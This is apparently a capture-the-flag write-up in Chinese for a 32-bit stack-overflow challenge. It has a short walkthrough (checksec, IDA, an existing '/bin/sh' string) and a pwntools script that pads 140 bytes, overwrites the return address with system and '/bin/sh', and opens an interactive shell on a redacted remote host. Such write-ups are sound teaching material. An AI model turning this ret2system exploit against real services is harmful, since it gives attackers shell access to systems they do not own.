先用 checksec 查看一下程序的保护情况,这是一道栈溢出题。
用 IDA 打开看看,很容易找到溢出点;程序里也有现成的 /bin/sh 字符串。
from pwn import *
from LibcSearcher import *
# Describe the target to pwntools: 32-bit x86 Linux, with verbose I/O logging.
context.update(os='linux', arch='i386', log_level='debug')


def sl(x):
    """Send x to the remote service, followed by a newline."""
    return io.sendline(x)


def ru(x):
    """Read from the remote service up to and including the delimiter x."""
    return io.recvuntil(x)


# Host and port are redacted in the write-up; the bare name `xxx` is not
# defined anywhere, so real values have to be filled in before this runs.
io = remote('xxx', xxx)

# Hard-coded addresses from the binary. They only hold while the image is
# loaded at a fixed base -- NOTE(review): confirm against the checksec output
# (PIE off); a position-independent build would invalidate both values.
binsh = 0x804a024   # the "/bin/sh" string the write-up says is in the program
system = 0x8048320  # address used for system -- presumably its PLT entry; verify

# Wait for the prompt before sending anything.
ru(':')

# Payload layout, one 32-bit little-endian word per field:
#   35 zero words (140 bytes) of filler -- presumably the distance from the
#       start of the buffer to the saved return address; TODO confirm in IDA
#   address of system, overwriting the return address
#   one zero word, sitting where system would find its own return address
#   address of "/bin/sh", read by system as its first (stack-passed) argument
# A stack canary on the vulnerable function would be overwritten by the
# filler and abort the process before the return is reached.
padding = p32(0) * 35
payload = padding + p32(system) + p32(0) + p32(binsh)
sl(payload)

# Hand the connection over to the terminal.
io.interactive()